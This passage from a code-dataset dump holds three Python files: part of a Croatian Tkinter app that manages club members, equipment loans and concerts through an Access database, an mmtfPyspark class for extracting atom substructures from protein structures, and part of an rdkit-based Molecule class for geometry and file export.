Tkinter.Frame(self.root,relief=RIDGE,borderwidth=2)\n\n #logo slika\n self.logo = ImageTk.PhotoImage(file='vura_logo.jpg')\n self.pic = Tkinter.Label(self.frame, image=self.logo)\n self.pic.grid(row=0,column=0,columnspan=4,pady=15)\n\n #set za clanove\n self.clanlabel = Tkinter.Label(self.frame,text='Članovi'.decode('windows-1250'),font=('Arial',14))\n self.popis = Tkinter.Button(self.frame,text='Popis članova'.decode('windows-1250'),width=30,height=2,command=lambda:Table(self.root).openTable('clan'))\n self.dodaj = Tkinter.Button(self.frame,text='Dodaj novog člana'.decode('windows-1250'),width=30,height=2,command=lambda:Form(self.root).createForm('clan',False,None,None))\n self.azuriraj = Tkinter.Button(self.frame,text='Ažuriraj članove'.decode('windows-1250'),width=30,height=2,command=lambda:List(self.root).createList('clan',False))\n self.obrisi = Tkinter.Button(self.frame,text='Obriši člana'.decode('windows-1250'),width=30,height=2,command=lambda:List(self.root).createList('clan',True))\n self.clanlabel.grid(row=1,column=0,pady=5)\n self.popis.grid(row=2,column=0,padx=10,pady=5)\n self.dodaj.grid(row=3,column=0,padx=10,pady=5)\n self.azuriraj.grid(row=4,column=0,padx=10,pady=5)\n self.obrisi.grid(row=5,column=0,padx=10,pady=5)\n\n #set za posudbu\n self.posudbalabel = Tkinter.Label(self.frame,text='Posudba',font=('Arial',14))\n self.evidentiraj = Tkinter.Button(self.frame,text='Evidentiraj 
posudbu',width=30,height=2,command=lambda:Form(self.root).createForm('posudba',False,None,None))\n self.izvjestajpos = Tkinter.Button(self.frame,text='Izvještaj posudbe'.decode('windows-1250'),width=30,height=2,command=lambda:Table(self.root).openTable('posudba'))\n self.azurirajpos = Tkinter.Button(self.frame,text='Izmjeni posudbu',width=30,height=2,command=lambda:List(self.root).createList('posudba',False))\n self.stanjepos = Tkinter.Button(self.frame,text='Provjeri stanje na skladištu'.decode('windows-1250'),width=30,height=2,command=lambda:Table(self.root).openTable('oprema'))\n self.posudbalabel.grid(row=1,column=1,pady=5)\n self.evidentiraj.grid(row=2,column=1,padx=10,pady=5)\n self.izvjestajpos.grid(row=5,column=1,padx=10,pady=5)\n self.stanjepos.grid(row=4,column=1,padx=10,pady=5)\n self.azurirajpos.grid(row=3,column=1,padx=10,pady=5)\n\n #set za koncert\n self.koncertlabel = Tkinter.Label(self.frame,text='Koncert',font=('Arial',14))\n self.zabiljezi = Tkinter.Button(self.frame,text='Organiziraj koncert',width=30,height=2,command=lambda:Form(self.root).createForm('organizira',False,None,None))\n self.izvjestajkonc = Tkinter.Button(self.frame,text='Izvještaj koncerata'.decode('windows-1250'),width=30,height=2,command=lambda:Table(self.root).openTable('organizira'))\n self.azurirajkonc = Tkinter.Button(self.frame,text='Izmjeni koncert',width=30,height=2,command=lambda:List(self.root).createList('organizira',False))\n self.koncertlabel.grid(row=1,column=2,pady=5)\n self.zabiljezi.grid(row=2,column=2,padx=10,pady=5)\n self.izvjestajkonc.grid(row=4,column=2,padx=10,pady=5)\n self.azurirajkonc.grid(row=3,column=2,padx=10,pady=5)\n\n #gumb za izlaz\n self.exit = Tkinter.Button(self.frame,text='Izlaz',width=30,height=2,command=lambda:self.root.destroy())\n self.exit.grid(row=6,column=0,columnspan=3,pady=15)\n\n #pokreni\n self.frame.pack()\n self.root.mainloop()\n\n#encoding\nreload(sys)\nsys.setdefaultencoding('windows-1250')\n\n#prvo saznaj gdje je dbfile\nTK = TkApp()\ndbfile = TK.callDB()\nif dbfile is not '':\n #ostvari vezu sa bazom i pokreni GUI\n try:\n db = Database('Microsoft Access Driver (*.mdb, *.accdb)',dbfile)#dbasefile.replace('/','\\\\'))\n TK.start()\n except:\n try:\n db = Database('Microsoft Access Driver (*.mdb)',dbfile)#dbasefile.replace('/','\\\\'))\n TK.start()\n except:\n tkMessageBox.showerror(title=\"Greška!\",message=\"Ne mogu otvoriti datoteku.\\nGreška:\\n\\n\".decode('windows-1250')+traceback.format_exc(),parent=TK.root)\n TK.root.destroy()\nelse: TK.root.destroy()\n\n\n\n","sub_path":"zavrsni.py","file_name":"zavrsni.py","file_ext":"py","file_size_in_byte":14902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"97089378","text":"#!/usr/bin/env python\n\n__author__ = \"Peter Rose\"\n__maintainer__ = \"Peter Rose\"\n__version__ = \"0.4.0\"\n__status__ = \"Experimental\"\n\nimport numpy as np\nimport pandas as pd\n\n\nclass MmtfSubstructure(object):\n \"\"\"\n Extracts a substructure from a structure using the specified criteria.\n\n Parameters\n ----------\n structure : MmtfStructure\n Structure in decoded mmtf format\n chain_names: list(str)\n List of selected chain names\n chain_names: list\n chain_ids: list(str)\n List of selected chain names\n entity_types: list(str)\n List of selected entities\n * 'polymer' proteins and nucleic acids\n * 'non-polymer' all other chemical entities, except water\n * 'water' water and heavy water\n * None (select all entities), default\n\n Examples\n --------\n Return a structure with the whole A and B chains\n >>> chain = MmtfSubstructure(structure, 'AB', chain_names=['A','B'])\n\n Return a structure that contains only the polymer in chain A (no ligands, no waters)\n >>> chain = MmtfSubstructure(structure, 'A', chain_names=['A'], entity_types=['polymer'])\n \"\"\"\n\n def __init__(self, structure, label, chain_names=None, chain_ids=None, group_names=None,\n group_numbers=None, chem_comp_types=None, entity_types=None):\n self.structure = structure\n\n # Apply criteria to select atoms\n self.mask = np.full(structure.num_atoms, True)\n if chain_names is not None:\n self.mask = self.mask & np.in1d(structure.chain_names, list(chain_names))\\\n .reshape(structure.chain_names.shape)\n if chain_ids is not None:\n self.mask = self.mask & np.in1d(structure.chain_ids, list(chain_ids))\\\n .reshape(structure.chain_ids.shape)\n if group_names is not None:\n self.mask = self.mask & np.in1d(structure.group_names, list(group_names))\\\n .reshape(structure.group_names.shape)\n if group_numbers is not None:\n # TODO this should be a range, e.g. 
tuple ('1',10),(20,30)\n self.mask = self.mask & np.in1d(structure.group_numbers, list(group_numbers)) \\\n .reshape(structure.group_numbers.shape)\n if chem_comp_types is not None:\n self.mask = self.mask & np.in1d(structure.chem_comp_types, list(chem_comp_types))\\\n .reshape(structure.chem_comp_types.shape)\n if entity_types is not None:\n self.mask = self.mask & np.in1d(structure.entity_types, list(entity_types))\\\n .reshape(structure.entity_types.shape)\n\n # update counts\n self.num_atoms = np.count_nonzero(self.mask)\n self.modified = structure.num_atoms != self.num_atoms\n self.num_groups = np.unique(self.group_serial).size\n self.num_chains = np.unique(self.chain_serial).size\n self.num_models = structure.num_models\n\n self.mmtf_version = structure.mmtf_version\n self.mmtf_producer = structure.mmtf_producer\n self.unit_cell = structure.unit_cell\n self.space_group = structure.space_group\n self.structure_id = structure.structure_id + \".\" + label\n self.title = structure.title\n self.deposition_date = structure.deposition_date\n self.release_date = structure.release_date\n self.ncs_operator_list = structure.ncs_operator_list\n # TODO bio assemblies, bonds, entity lists\n self.bio_assembly = None\n self.entity_list = None\n\n self.experimental_methods = structure.experimental_methods\n self.resolution = structure.resolution\n self.r_free = structure.r_free\n self.r_work = structure.r_work\n # dataframes\n self.df = None\n\n @property\n def atom_id_list(self):\n \"\"\"ndarray: atom id list.\"\"\"\n return self.structure.atom_id_list[self.mask]\n\n @property\n def x_coord_list(self):\n \"\"\"ndarray: x coordinates\"\"\"\n return self.structure.x_coord_list[self.mask]\n\n @property\n def y_coord_list(self):\n \"\"\"Return y coordinates\"\"\"\n return self.structure.y_coord_list[self.mask]\n\n @property\n def z_coord_list(self):\n \"\"\"Return z coordinates\"\"\"\n return self.structure.z_coord_list[self.mask]\n\n @property\n def coords(self):\n \"\"\"Return 3xn coordinate array\"\"\"\n return np.column_stack((self.x_coord_list, self.y_coord_list, self.z_coord_list))\n\n @property\n def b_factor_list(self):\n \"\"\"Return b factors\"\"\"\n if self.structure.b_factor_list is None:\n return None\n return self.structure.b_factor_list[self.mask]\n\n @property\n def occupancy_list(self):\n \"\"\"Return occupancies\"\"\"\n if self.structure.occupancy_list is None:\n return None\n return self.structure.occupancy_list[self.mask]\n\n @property\n def alt_loc_list(self):\n \"\"\"Return alternative location codes\"\"\"\n if self.structure.alt_loc_list is None:\n return None\n return self.structure.alt_loc_list[self.mask]\n\n # calculated properties\n @property\n def chain_names(self):\n \"\"\"Return chain names\"\"\"\n return self.structure.chain_names[self.mask]\n\n @property\n def chain_ids(self):\n \"\"\"Return chain ids\"\"\"\n return self.structure.chain_ids[self.mask]\n\n @property\n def group_numbers(self):\n \"\"\"Return group numbers\"\"\"\n return self.structure.group_numbers[self.mask]\n\n @property\n def group_names(self):\n \"\"\"Return group names\"\"\"\n return self.structure.group_names[self.mask]\n\n @property\n def atom_names(self):\n \"\"\"Return group names\"\"\"\n return self.structure.atom_names[self.mask]\n\n @property\n def elements(self):\n \"\"\"Return group names\"\"\"\n return self.structure.elements[self.mask]\n\n @property\n def chem_comp_types(self):\n \"\"\"Return group names\"\"\"\n return self.structure.chem_comp_types[self.mask]\n\n @property\n def 
polymer(self):\n \"\"\"Return polymer\"\"\"\n return self.structure.polymer[self.mask]\n\n @property\n def entity_types(self):\n \"\"\"Return entity types\"\"\"\n return self.structure.entity_types[self.mask]\n\n @property\n def entity_indices(self):\n \"\"\"Return entity indices\"\"\"\n return self.structure.entity_indices[self.mask]\n\n @property\n def sequence_positions(self):\n \"\"\"Return sequence_positions\"\"\"\n return self.structure.sequence_positions[self.mask]\n\n @property\n def group_serial(self):\n \"\"\"Return group serial number\"\"\"\n return self.structure.group_serial[self.mask]\n\n @property\n def chain_serial(self):\n \"\"\"Return chain serial number\"\"\"\n return self.structure.chain_serial[self.mask]\n\n def to_pandas(self, add_cols=None, multi_index=False):\n if self.df is None:\n self.df = pd.DataFrame({'chain_name': self.chain_names,\n 'chain_id': self.chain_ids,\n 'group_number': self.group_numbers,\n 'group_name': self.group_names,\n 'atom_name': self.atom_names,\n 'altloc': self.alt_loc_list,\n 'x': self.x_coord_list,\n 'y': self.y_coord_list,\n 'z': self.z_coord_list,\n 'o': self.occupancy_list,\n 'b': self.b_factor_list,\n 'element': self.elements,\n 'polymer': self.polymer,\n })\n\n if add_cols is not None:\n if 'sequence_position' in add_cols:\n self.df['sequence_position'] = pd.Series(self.sequence_positions, index=self.df.index)\n if 'chem_comp_type' in add_cols:\n self.df['chem_comp_type'] = pd.Series(self.chem_comp_types, index=self.df.index)\n if 'entity_index' in add_cols:\n self.df['entity_index'] = pd.Series(self.entity_indices, index=self.df.index)\n if 'entity_type' in add_cols:\n self.df['entity_type'] = pd.Series(self.entity_types, index=self.df.index)\n\n if multi_index:\n self.df.set_index(['chain_name', 'chain_id', 'group_number', 'group_name', 'atom_name', 'altloc'], inplace=True)\n\n return self.df\n\n def entities_to_pandas(self):\n indices = np.unique(self.entity_indices)\n entities = self.structure.entities_to_pandas()\n return entities[entities['entity_id'] in indices]\n\n # def _update_entity_list(self):\n # # updated_chain_ids = np.unique(self.chain_ids)\n # # for id in updated_chain_ids:\n # # entity = self.structure.chainIdToEntityIndices[id]\n # # chainIdToEntityIndices\n #\n # new_indices = set(np.unique(self.entity_indices))\n #\n # entity_list_new = []\n # for entity in self.entity_list:\n # old_indices = set(entity['chainIndexList'])\n # updated_indices = old_indices.intersection(new_indices)\n # if len(updated_indices) >= 0:\n # entity_list_new.append(self.make_entity_dict(entity['chainIndexList'], entity['sequence'], entity['description'], entity['type']))\n\n def make_entity_dict(self, chain_indices, sequence, description, entity_type):\n out_d = {}\n out_d[\"description\"] = description\n out_d[\"type\"] = entity_type\n out_d[\"chainIndexList\"] = chain_indices\n out_d[\"sequence\"] = sequence\n return out_d\n\n\n\n\n\n\n\n\n\n","sub_path":"mmtfPyspark/utils/mmtfSubstructure.py","file_name":"mmtfSubstructure.py","file_ext":"py","file_size_in_byte":9771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
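
The constructor filtering in `MmtfSubstructure` above reduces to AND-ing `np.in1d` membership masks over parallel per-atom arrays. A minimal standalone illustration of the pattern:

```python
import numpy as np

chain_names = np.array(['A', 'A', 'B', 'B', 'C'])
entity_types = np.array(['polymer', 'water', 'polymer', 'polymer', 'non-polymer'])

mask = np.full(chain_names.size, True)
mask &= np.in1d(chain_names, ['A', 'B'])    # atoms in chains A or B...
mask &= np.in1d(entity_types, ['polymer'])  # ...that are also polymer atoms

print(np.nonzero(mask)[0])  # [0 2 3] -- indices passing every criterion
```
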
+{"seq_id":"535515243","text":"import json\nimport os\nimport numpy as np\nimport networkx as nx\nimport rdkit.Geometry.rdGeometry as rdkit_geo\nimport rdkit.Chem.AllChem as rdkit\nfrom rdkit.Chem import rdMolTransforms\nfrom scipy.spatial.distance import euclidean\nfrom sklearn.metrics.pairwise import euclidean_distances\nfrom collections import defaultdict\n\nfrom ...utilities import (normalize_vector,\n rotation_matrix,\n mol_from_mae_file,\n rotation_matrix_arbitrary_axis,\n atom_vdw_radii,\n remake)\n\n\nclass MoleculeSubclassError(Exception):\n ...\n\n\nclass Molecule:\n \"\"\"\n The most basic class representing molecules.\n\n This class defines the operations which any class\n describing molecules should inherit or may find useful. Examples of\n such are :class:`StructUnit` and :class:`MacroMolecule`. This class\n should not be used directly.\n\n Attributes\n ----------\n mol : :class:`rdkit.Mol`\n An ``rdkit`` molecule instance representing the molecule.\n\n inchi : :class:`str`\n The InChI of the molecule.\n\n atom_props : :class:`dict`\n Maps atom id to a :class:`dict` holding the properties of\n that atom. For example\n\n .. code-block:: python\n\n atom_props = {0: {'prop1': 0,\n 'prop2': 'value1',\n 'prop3': 10.},\n\n 5: {'prop1': 'value2',\n 'prop5': 2.0}}\n\n name : :class:`str`\n A name which can be optionally given to the molecule for easy\n identification.\n\n note : :class:`str`\n A note or comment about the molecule. Purely optional but can\n be useful for labelling and debugging.\n\n \"\"\"\n\n subclasses = {}\n\n def __init__(self, name=\"\", note=\"\"):\n self.name = name\n self.note = note\n self.atom_props = defaultdict(dict)\n\n def __init_subclass__(cls, **kwargs):\n if cls.__name__ in cls.subclasses:\n msg = 'Subclass with this name already exists.'\n raise MoleculeSubclassError(msg)\n cls.subclasses[cls.__name__] = cls\n super().__init_subclass__(**kwargs)\n\n def all_atom_coords(self, conformer=-1):\n \"\"\"\n Yields the coordinates of atoms in :attr:`mol`.\n\n Parameters\n ----------\n conformer : :class:`int`, optional\n The id of the conformer to be used.\n\n Yields\n ------\n :class:`tuple`\n The yielded :class:`tuple` has the form\n\n .. code-block:: python\n\n (32, numpy.array([12, 34, 3]))\n\n Where the first element is the atom id and the second\n element is an array holding the coordinates of the atom.\n\n \"\"\"\n\n # Get the conformer from the rdkit instance.\n conf = self.mol.GetConformer(conformer)\n\n # Go through all the atoms and ask the conformer to return\n # the position of each atom. 
This is done by supplying the\n # conformers `GetAtomPosition` method with the atom's id.\n for atom in self.mol.GetAtoms():\n atom_id = atom.GetIdx()\n atom_position = conf.GetAtomPosition(atom_id)\n yield atom_id, np.array([*atom_position])\n\n def atom_centroid(self, atom_ids, conformer=-1):\n \"\"\"\n Return the centroid of a group of atoms.\n\n Parameters\n ----------\n atom_ids : :class:`list` of :class:`int`\n The ids of atoms which which are used to calculate the\n centroid.\n\n conformer : :class:`int`, optional\n The id of the conformer to be used.\n\n Returns\n -------\n :class:`numpy.ndarray`\n The centroid of atoms specified by `atom_ids`.\n\n \"\"\"\n\n coords = (self.atom_coords(a, conformer) for a in atom_ids)\n return sum(coords) / len(atom_ids)\n\n def atom_coords(self, atom_id, conformer=-1):\n \"\"\"\n Return coordinates of an atom.\n\n Parameters\n ----------\n atom_id : :class:`int`\n The id of the atom whose coordinates are desired.\n\n conformer : :class:`int`, optional\n The id of the conformer to be used.\n\n Returns\n -------\n :class:`numpy.ndarray`\n An array holding the x, y and z coordinates of the atom.\n\n \"\"\"\n\n conf = self.mol.GetConformer(conformer)\n return np.array(conf.GetAtomPosition(atom_id))\n\n def atom_distance(self, atom1_id, atom2_id, conformer=-1):\n \"\"\"\n Return the distance between 2 atoms.\n\n Parameters\n ----------\n atom1_id : :class:`int`\n The id of the first atom.\n\n atom2_id : :class:`int`\n The id of the second atom.\n\n conformer : :class:`int`, optional\n The id of the conformer to be used.\n\n Returns\n -------\n :class:`scipy.double`\n The distance between the first and second atoms.\n\n \"\"\"\n\n # Get the atomic positions of each atom and use the scipy\n # function to calculate their distance in Euclidean space.\n atom1_coords = self.atom_coords(atom1_id, conformer)\n atom2_coords = self.atom_coords(atom2_id, conformer)\n return euclidean(atom1_coords, atom2_coords)\n\n def atom_symbol(self, atom_id):\n \"\"\"\n Returns the symbol of the atom with id `atom_id`.\n\n Parameters\n ----------\n atom_id : :class:`int`\n The id number of the atom.\n\n Returns\n -------\n :class:`str`\n The atomic symbol of the atom.\n\n \"\"\"\n\n return self.mol.GetAtomWithIdx(atom_id).GetSymbol()\n\n def center_of_mass(self, conformer=-1):\n \"\"\"\n Returns the centre of mass of the molecule.\n\n Parameters\n ---------\n conformer : :class:`int`, optional\n The id of the conformer to use.\n\n Returns\n -------\n :class:`numpy.ndarray`\n An array holding the coordinates of the center of mass.\n\n References\n ----------\n https://en.wikipedia.org/wiki/Center_of_mass\n\n \"\"\"\n\n center = np.array([0., 0., 0.])\n total_mass = 0.\n for atom_id, coord in self.all_atom_coords(conformer):\n mass = self.mol.GetAtomWithIdx(atom_id).GetMass()\n total_mass += mass\n center += mass*coord\n return np.divide(center, total_mass)\n\n def centroid(self, conformer=-1):\n \"\"\"\n Returns the centroid of the molecule.\n\n Parameters\n ---------\n conformer : :class:`int`, optional\n The id of the conformer to use.\n\n Returns\n -------\n :class:`numpy.ndarray`\n A numpy array holding the position of the centroid.\n\n \"\"\"\n\n coords = (\n coord for _, coord in self.all_atom_coords(conformer)\n )\n return sum(coords) / self.mol.GetNumAtoms()\n\n def core(self):\n \"\"\"\n Return the molecule with no H or functional group atoms.\n\n Returns\n -------\n :class:`rdkit.Mol`\n The \"core\" of the molecule.\n\n \"\"\"\n\n emol = rdkit.EditableMol(self.mol)\n 
for atom in reversed(self.mol.GetAtoms()):\n atomid = atom.GetIdx()\n if not self.is_core_atom(atomid):\n emol.RemoveAtom(atomid)\n return emol.GetMol()\n\n def dihedral_strain(self,\n dihedral_SMARTS='',\n target=180,\n conformer=-1):\n \"\"\"\n Returns the difference between the average dihedral and target.\n\n The differences is a returned as a percent.\n\n Parameters\n ----------\n dihedral_SMARTS : :class:`str`\n The SMARTS code for the dihedral of interest.\n\n target : :class:`float`\n Float representing the target value for the dihedral angle.\n\n conformer : :class:`int`, optional\n The id of the conformer to be used.\n\n Returns\n -------\n :class:`float`\n The percent difference between the average dihedral in the\n molecule and the target value.\n\n \"\"\"\n\n match = rdkit.MolFromSmarts(dihedral_SMARTS)\n atoms_dihedral = self.mol.GetSubstructMatches(match)\n\n dihedral_info = []\n if len(atoms_dihedral) > 0 and len(atoms_dihedral[0]) != 0:\n for atoms_group in atoms_dihedral:\n # Calculate the dihedral angle.\n dihedral_value = rdMolTransforms.GetDihedralDeg(\n self.mol.GetConformer(conformer),\n atoms_group[0],\n atoms_group[1],\n atoms_group[2],\n atoms_group[3])\n # Check that the dihedral is calculated in the right\n # direction.\n if abs(dihedral_value) > 90:\n dihedral_value = abs(dihedral_value)\n else:\n dihedral_value = 180 - abs(dihedral_value)\n\n dihedral_info.append(dihedral_value)\n\n # Calculate the average dihedral value.\n avg_dihedral = np.mean([abs(x) for x in dihedral_info])\n # Calculate the relative diff with the target dihedral\n # value.\n diff = (abs(target - avg_dihedral) / target) * 100\n else:\n # If the molecule does not contain the bond, give 1%\n # strain.\n diff = 1\n\n return diff\n\n def dump(self, path, include_attrs=None):\n \"\"\"\n Writes a JSON :class:`dict` of the molecule to a file.\n\n Parameters\n ----------\n path : :class:`str`\n The full path to the file to which the JSON dict should be\n written.\n\n include_attrs : :class:`list` of :class:`str`, optional\n The names of attributes of the molecule to be added to\n the JSON. Each attribute is saved as a string using\n :func:`repr`.\n\n Returns\n -------\n None : :class:`NoneType`\n\n \"\"\"\n\n with open(path, 'w') as f:\n json.dump(self.json(include_attrs), f, indent=4)\n\n @classmethod\n def from_dict(self, json_dict, load_names=True):\n \"\"\"\n Creates a :class:`Molecule` from a JSON :class:`dict`.\n\n The :class:`Molecule` returned has the class specified in\n `json_dict`, not :class:`Molecule`.\n\n Parameters\n ----------\n json_dict : :class:`dict`\n A :class:`dict` holding the JSON representation of a\n molecule.\n\n load_names : :class:`bool`, optional\n If ``True`` then the ``name`` key stored in `json_dict`\n is loaded.\n\n Returns\n -------\n :class:`Molecule`\n The molecule represented by `json_dict`.\n\n \"\"\"\n\n # Get the class of the object.\n c = self.subclasses[json_dict['class']]\n json_dict['load_names'] = load_names\n return c._json_init(json_dict)\n\n def graph(self):\n \"\"\"\n Returns a mathematical graph representing the molecule.\n\n Returns\n -------\n :class:`networkx.Graph`\n A graph where the nodes are the ids of the atoms and the\n edges are the bonds.\n\n \"\"\"\n\n # Create a graph instance and add the atom ids as nodes. Use\n # the atom ids from each end of a bond to define edges. 
Do this\n # for all bonds to account for all edges.\n\n graph = nx.Graph()\n\n for atom in self.mol.GetAtoms():\n graph.add_node(atom.GetIdx())\n\n for bond in self.mol.GetBonds():\n graph.add_edge(bond.GetBeginAtomIdx(),\n bond.GetEndAtomIdx())\n\n return graph\n\n @property\n def inchi(self):\n \"\"\"\n Returns the InChI of the molecule.\n\n Returns\n -------\n :class:`str`\n The InChI of the molecule.\n\n \"\"\"\n\n self.update_stereochemistry()\n return rdkit.MolToInchi(self.mol)\n\n def is_core_atom(self, atom_id):\n \"\"\"\n Returns ``True`` if atom is not H or part of a fg.\n\n Parameters\n ----------\n atom_id : :class:`int`\n The id of the atom being queried.\n\n Returns\n -------\n :class:`bool`\n Indicates whether the atom with `atom_id` is part of the\n core.\n\n \"\"\"\n\n atom = self.mol.GetAtomWithIdx(atom_id)\n if atom.GetAtomicNum() == 1:\n return False\n return all(\n atom_id not in fg.atom_ids for fg in self.func_groups\n )\n\n @classmethod\n def load(cls, path, load_names=True):\n \"\"\"\n Creates a :class:`Molecule` from a JSON file.\n\n The returned :class:`Molecule` has the class specified in the\n JSON file, not :class:`Molecule`.\n\n Parameters\n ----------\n path : :class:`str`\n The full path holding a JSON representation to a molecule.\n\n load_names : :class:`bool`, optional\n If ``True`` then the ``name`` key stored in the JSON file\n is loaded.\n\n Returns\n -------\n :class:`Molecule`\n The molecule held in `path`.\n\n \"\"\"\n\n with open(path, 'r') as f:\n json_dict = json.load(f)\n\n return cls.from_dict(json_dict, load_names)\n\n def max_diameter(self, conformer=-1):\n \"\"\"\n Returns the largest distance between 2 atoms in the molecule.\n\n Parameters\n ----------\n conformer : :class:`int`, optional\n The id of the conformer to use.\n\n Returns\n -------\n :class:`tuple` of form (float, int, int)\n A :class:`tuple` of the form\n\n .. code-block:: python\n\n max_diameter = (312.3, 4, 54)\n\n Where the first element is the largest inter-atomic\n distance in the molecule. The next 2 elements are the ids\n of the involved atoms.\n\n \"\"\"\n\n coords = self.mol.GetConformer(conformer).GetPositions()\n dist = euclidean_distances(coords, coords)\n vdw = np.array([[atom_vdw_radii[self.atom_symbol(i)] for\n i in range(self.mol.GetNumAtoms())]])\n dist = dist + vdw + vdw.T\n maxid1, maxid2 = np.unravel_index(dist.argmax(), dist.shape)\n return dist[maxid1, maxid2], int(maxid1), int(maxid2)\n\n def mdl_mol_block(self, conformer=-1):\n \"\"\"\n Returns a V3000 mol block of the molecule.\n\n Parameters\n ---------\n conformer : :class:`int`, optional\n The id of the conformer to use.\n\n Returns\n -------\n :class:`str`\n The V3000 mol block representing the molecule.\n\n \"\"\"\n\n # Kekulize the mol, which means that each aromatic bond is\n # converted to a single or double. This is necessary because\n # .mol V3000 only supports integer bonds. 
However, this fails\n # sometimes on big molecules.\n try:\n rdkit.Kekulize(self.mol)\n except ValueError:\n pass\n\n n_atoms = self.mol.GetNumAtoms()\n n_bonds = self.mol.GetNumBonds()\n\n dtype = np.dtype(object)\n\n atom_ids = np.array([np.arange(1, n_atoms+1)],\n dtype=dtype).T\n\n atom_symbols = np.array([[self.atom_symbol(i)]\n for i in range(n_atoms)],\n dtype=dtype)\n\n pos_mat = self.mol.GetConformer(conformer).GetPositions()\n\n charges = np.array([[f' CHG={a.GetFormalCharge()}' if\n a.GetFormalCharge() else '']\n for a in self.mol.GetAtoms()],\n dtype=dtype)\n\n atom_data = np.concatenate(\n [atom_ids, atom_symbols, pos_mat, charges],\n axis=1).reshape((-1, ))\n atom_block = \"M V30 {} {} {:.4f} {:.4f} {:.4f} 0{}\\n\"*n_atoms\n atom_block = atom_block.format(*atom_data)\n\n bond_data = [prop for bond in self.mol.GetBonds() for prop in\n (bond.GetIdx(),\n int(bond.GetBondTypeAsDouble()),\n bond.GetBeginAtomIdx()+1,\n bond.GetEndAtomIdx()+1)]\n bond_block = \"M V30 {} {} {} {}\\n\"*n_bonds\n bond_block = bond_block.format(*bond_data)\n\n return (\"\\n\"\n \" RDKit 3D\\n\"\n \"\\n\"\n \" 0 0 0 0 0 0 0 0 0 0999 V3000\\n\"\n \"M V30 BEGIN CTAB\\n\"\n f\"M V30 COUNTS {n_atoms} {n_bonds} 0 0 0\\n\"\n \"M V30 BEGIN ATOM\\n\"\n f\"{atom_block}\"\n \"M V30 END ATOM\\n\"\n \"M V30 BEGIN BOND\\n\"\n f\"{bond_block}\"\n \"M V30 END BOND\\n\"\n \"M V30 END CTAB\\n\"\n \"M END\\n\"\n \"\\n\"\n \"$$$$\\n\")\n\n def position_matrix(self, conformer=-1):\n \"\"\"\n Returns a matrix holding the atomic positions of a conformer.\n\n Parameters\n ----------\n conformer : :class:`int`, optional\n The conformer to use.\n\n Returns\n -------\n :class:`numpy.ndarray`\n The array has the shape ``[3, n]``. Each column holds the\n x, y and z coordinates of a bonder centroid. 
The index of\n the column corresponds to the atom id.\n\n \"\"\"\n\n return self.mol.GetConformer(conformer).GetPositions().T\n\n def same(self, other):\n \"\"\"\n Check if `other` has the same molecular structure.\n\n Parameters\n ----------\n other : :class:`Molecule`\n The :class:`Molecule` instance you are checking has\n the same structure.\n\n Returns\n -------\n :class:`bool`\n Returns ``True`` if the structures match.\n\n \"\"\"\n\n return self.inchi == other.inchi\n\n def save_rdkit_atom_props(self, prop_names):\n \"\"\"\n Updates :attr:`~.Molecule.atom_props` with rdkit atom tags.\n\n Parameters\n ----------\n prop_names : :class:`set` of :class:`str`\n The names of atom properties which should be saved.\n\n Returns\n -------\n None : :class:`NoneType`\n\n \"\"\"\n\n for atom in self.mol.GetAtoms():\n atom_id = atom.GetIdx()\n props = atom.GetPropsAsDict()\n valid_props = props.keys() & prop_names\n for prop_name in valid_props:\n self.atom_props[atom_id][prop_name] = props[prop_name]\n\n def rotate(self, theta, axis, conformer=-1):\n \"\"\"\n Rotates the molecule by `theta` about `axis`.\n\n The rotation occurs about the molecular centroid.\n\n Parameters\n ----------\n theta : :class:`float`\n The size of the rotation in radians.\n\n axis : :class:`numpy.ndarray`\n The axis about which the rotation happens.\n\n conformer : :class:`int`, optional\n The id of the conformer to use.\n\n Returns\n -------\n None : :class:`NoneType`\n\n \"\"\"\n\n # Save the original position.\n og_position = self.centroid(conformer)\n # Move the centroid of the molecule to the origin, so that the\n # rotation occurs about this point.\n self.set_position([0, 0, 0], conformer)\n # Get the rotation matrix.\n rot_mat = rotation_matrix_arbitrary_axis(theta, axis)\n # Apply the rotation matrix on the position matrix, to get the\n # new position matrix.\n pos_mat = self.mol.GetConformer(conformer).GetPositions()\n new_pos_mat = rot_mat @ pos_mat.T\n # Apply the rotation.\n self.set_position_from_matrix(new_pos_mat, conformer)\n # Return the centroid of the molecule to the origin position.\n self.set_position(og_position, conformer)\n\n def set_orientation(self, start, end, conformer=-1):\n \"\"\"\n Rotates the molecule by a rotation from `start` to `end`.\n\n Given two direction vectors, `start` and `end`, this method\n applies the rotation required transform `start` to `end` on\n the molecule. The rotation occurs about the centroid of the\n molecule.\n\n For example, if the `start` and `end` vectors\n are 45 degrees apart, a 45 degree rotation will be applied to\n the molecule. The rotation will be along the appropriate\n direction.\n\n The great thing about this method is that you as long as you\n can associate a geometric feature of the molecule with a\n vector, then the molecule can be rotated so that this vector is\n aligned with `end`. The defined vector can be virtually\n anything. 
This means that any geometric feature of the molecule\n can be easily aligned with any arbitrary axis.\n\n Notes\n -----\n The difference between this method and\n :meth:`StructUnit._set_orientation2` is about which point the\n rotation occurs: centroid of the entire molecule versus\n centroid of the bonder atoms, respectively.\n\n Parameters\n ----------\n start : :class:`numpy.ndarray`\n A vector which is to be rotated so that it transforms to\n the `end` vector.\n\n end : :class:`numpy.ndarray`\n This array holds the vector, onto which `start` is rotated.\n\n conformer : :class:`int`, optional\n The id of the conformer to use.\n\n Returns\n -------\n :class:`rdkit.Mol`\n The ``rdkit`` molecule in :attr:`~Molecule.mol`.\n\n \"\"\"\n\n # Normalize the input direction vectors.\n start = normalize_vector(start)\n end = normalize_vector(end)\n\n # Record the position of the molecule then translate the\n # centroid to the origin. This is so that the rotation occurs\n # about this point.\n og_center = self.centroid(conformer)\n self.set_position([0, 0, 0], conformer)\n\n # Get the rotation matrix.\n rot_mat = rotation_matrix(start, end)\n\n # Apply the rotation matrix to the atomic positions to yield\n # the new atomic positions.\n pos_mat = self.mol.GetConformer(conformer).GetPositions().T\n new_pos_mat = np.dot(rot_mat, pos_mat)\n\n # Set the positions of the molecule.\n self.set_position_from_matrix(new_pos_mat, conformer)\n self.set_position(og_center, conformer)\n\n return self.mol\n\n def set_position(self, position, conformer=-1):\n \"\"\"\n Sets the centroid of the molecule to `position`.\n\n Parameters\n ----------\n position : :class:`numpy.ndarray`\n This array holds the position on which the centroid of the\n molecule should be placed.\n\n conformer : :class:`int`, optional\n The id of the conformer to be used.\n\n Returns\n 